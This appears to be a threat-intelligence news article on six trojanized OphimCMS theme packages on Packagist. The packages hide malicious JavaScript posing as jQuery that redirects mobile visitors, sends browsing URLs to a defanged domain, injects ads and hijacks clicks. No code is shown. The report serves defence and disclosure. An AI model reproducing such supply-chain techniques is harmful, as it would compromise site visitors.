Malicious Packagist Themes Target Vietnamese OphimCMS Sites with Trojanized JS
Ddos 
The Packagist page for ophimcms/theme-dy
Cybersecurity investigators at Socket’s Threat Research Team have sounded the alarm after discovering a cluster of malicious packages targeting the Vietnamese streaming community. The threat involves six compromised packages published under the ophimcms namespace on Packagist, the primary repository for PHP’s Composer manager.
The attackers are leveraging the popularity of OphimCMS, a Laravel-based content management system used extensively for movie streaming sites in Vietnam, to trick developers into installing trojanized themes.
The malicious packages are designed to look identical to legitimate themes, mimicking the naming conventions of the real platform to blend in. However, hidden within these themes are trojanized JavaScript assets, often disguised as standard jQuery libraries.
As the researchers at Socket explained:
“The packages mimic the naming conventions of OphimCMS… to appear as legitimate themes for the platform. All six ship trojanized JavaScript assets, primarily disguised as legitimate jQuery libraries”.
Once a streaming site administrator installs one of these themes, every visitor to that site becomes a potential target for a multi-stage infection chain.
The most severe versions of the malware load a second-stage payload from infrastructure operated by FUNNULL Technology Inc.. Based in the Philippines, FUNNULL was sanctioned by the U.S. Department of the Treasury (OFAC) in May 2025 for its role in facilitating over $200 million in cryptocurrency investment scams.
When a user visits an infected movie site on a mobile device, the malware triggers a redirect to gambling platforms or adult content sites. Beyond these redirects, the malicious code can also:
- Exfiltrate URLs: Send the visitor’s browsing history to the
userstat[.]netdomain. - Inject Ads: Force unauthorized advertisements onto the streaming page.
- Hijack Clicks: Redirect a user’s clicks to unintended destinations.
“The JavaScript payloads execute client-side in the visitor’s browser, so the server hosting the application is not directly compromised, but every user who loads the affected theme is affected“.
At the time of analysis, the six malicious packages—including theme-dy, theme-01, and theme-02—had recorded approximately 2,750 total installs. While the redirect chain to gambling sites is primarily restricted to mobile devices in Chinese timezones, the ad injection and click-hijacking components affect all visitors regardless of their location.
Socket has already submitted takedown requests to the Packagist security team, but administrators of movie streaming sites must remain vigilant.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
